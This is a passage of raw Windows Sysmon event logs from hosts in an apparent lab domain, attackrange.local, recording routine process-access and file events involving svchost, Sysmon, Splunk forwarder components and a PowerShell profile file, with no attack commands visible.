08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F78B-60EB-CB79-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.041{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F78B-60EB-CB79-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.042{0C1E0330-F78B-60EB-CB79-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.823{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=114F6EF6AEF8B91F2C43E3A8E4DA7481,SHA256=F8CC2819E3BE764A05358A72FBD13937F3373382F042AA5C83AAE74F1611F523,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:28.870{466BC892-F786-60EB-CA7D-00000000CF01}9508ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:28.118{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A5EE5C83B9D39D2BDFE972EC0998245,SHA256=5D414C646D670A0985D49FCB5CCAB3E0171F506D22601D5EF146444FD931AFC3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.588{0C1E0330-F78C-60EB-CD79-00000000D001}38563108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F78C-60EB-CD79-00000000D001}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F78C-60EB-CD79-00000000D001}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F78C-60EB-CD79-00000000D001}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 